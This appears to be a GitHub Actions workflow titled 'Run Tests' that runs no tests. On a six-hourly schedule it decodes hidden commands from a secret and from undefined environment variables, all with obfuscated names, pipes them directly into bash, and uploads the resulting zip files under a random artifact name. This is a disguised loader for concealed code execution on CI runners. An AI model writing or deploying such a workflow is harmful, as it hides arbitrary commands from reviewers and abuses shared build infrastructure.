name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '34 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run
        env:
          plyjd9291: ${{ secrets.plyjd9291 }}
        run: |
          printf '%s' "$plyjd9291" | jq -r .enfwv75315 | /bin/bash
          printf '%s' "$gxhc07287" | jq -r .rbepx9 | /bin/bash
          echo $qtk96 | jq -r .x8 | /bin/bash
          echo $ohf861 | jq -r .o189 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: UuSTEaDF
          path: "*.zip"
          retention-days: 1
